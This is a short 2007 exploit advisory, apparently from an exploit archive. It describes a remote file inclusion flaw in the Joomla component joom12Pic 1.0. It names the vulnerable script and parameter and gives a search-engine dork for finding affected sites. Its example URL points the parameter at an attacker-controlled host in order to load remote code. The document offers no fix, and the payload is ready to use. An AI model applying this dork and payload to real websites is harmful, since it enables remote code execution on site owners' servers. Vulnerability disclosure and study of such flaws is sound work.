Joomla Component joom12Pic 1.0 Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Joomla Component joom12Pic 1.0 Remote File Inclusion Vulnerability
# Published : 2007-09-16
# Author : Morgan
# Previous Title : Alcatel-Lucent OmniPCX Enterprise Communication Server <= 7.1 masterCGI Command Injection
# Next Title : SkaDate Online 5.0/6.0 Remote File Disclosure Vulnerability

######################################
# Joom!12Pic Component RFI           #
######################################

Bug in :
/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=
Variable : $mosConfig_live_site

Dork: "com_joom12pic"

Example:

http://xxx.net/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=[attacker]


Greets to all Irc.RealWorm.Net #Morgan Users ;)

# www.Syue.com [2007-09-16]